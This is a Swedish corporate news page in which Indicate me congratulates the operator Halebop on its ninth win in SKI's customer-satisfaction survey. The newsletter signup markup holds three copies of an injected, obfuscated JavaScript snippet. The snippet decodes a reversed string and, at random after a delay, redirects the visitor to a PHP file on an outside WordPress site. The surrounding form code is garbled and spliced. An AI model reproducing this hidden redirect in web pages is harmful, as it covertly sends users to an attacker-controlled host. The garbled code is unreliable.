Halebop har Sveriges nöjdaste kunder – för nionde gången!

Halebop-sveriges-nojdaste-kunder-indicate-me

Årligen genomför Svenskt Kvalitetsindex (SKI) en undersökning om kundnöjdheten bland svenska mobiloperatörer. För nionde gången kammar Halebop hem första pris!

Igår publicerade SKI sin årliga rapport av mobilbranschen med fokus på kundnöjdhet. I studien framkommer det att kundnöjdheten bland privatkunder är högre än någonsin. Tidigare har kunder, både privata och företag, uppskattat mer hårda värden såsom täckning, surfmängd och pris, vilket nu har övergått till personlig service.

– Att kunder har gått från att prioritera teknik till att uppskatta service är något som Halebop har anammat och vi är glada över att vi har kunnat bidra inom just kundservicedelen, berättar Lina Bjelkmar, VD på Indicate me.

Genom outsourcingpartnern Releasy analyserar Halebop sin kundservice i Indicate me.

– Vi är såklart mycket glada över att vi har kunnat bidra med en ökad förståelse av kundupplevelsen i kundservice och att Halebop genom ett gediget arbete har vunnit titeln om Sveriges nöjdaste kunder – för nionde gången, säger Lina.

Avslutningsvis tillägger Lina:

– Vi på Indicate me vill rikta ett stort grattis till Halebop!


Om oss
Indicate me erbjuder moderna digitala tjänster som hjälper företag till förbättrad kvalité, kundnöjdhet och högre lönsamhet i sin kundservice. Användare av Indicate me’s verktyg inkluderar företag såsom Ving och C More. Indicate me är dotterbolag till Releasy och ingår i samma koncern som Pulsen AB.

Nyhetsbrev
Prenumerera på vårt nyhetsbrev och ta del av den senaste informationen om Indicate me.

 
$NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tocomplete=”off” maxlength=”512″ name=”Contact.email” required=”required” type=”email” placeholder=”E-post *” /> $NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton class=”Button Button–bordered” type=”submit”>Prenumerera$NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton>


torAll("input, textarea");for(var s=0;stop.location.href=t;else{var e=document.getElementById(”up-form”),n=document.getElementById(”up-form-thanks”);e.style.display=”none”,n.style.display=”block”,a&&a.push&&a.push([”trackLink”,”https://post.upsales.com/”+f.responseText,”link”]),_uaq&&_uaq(”form=”+f.responseText)}else console.log(”AJAX ERROR”,f.status)}}else{var l=document.getElementById(”recaptcha-error”),c=document.getElementsByClassName(”g-recaptcha”);l.style.display=”none”,c&&c.length&&console.log(”handle this later”)}}var form=document.getElementById(”up-form”);form.addEventListener(”submit”,onSubmit)

 Kontakta oss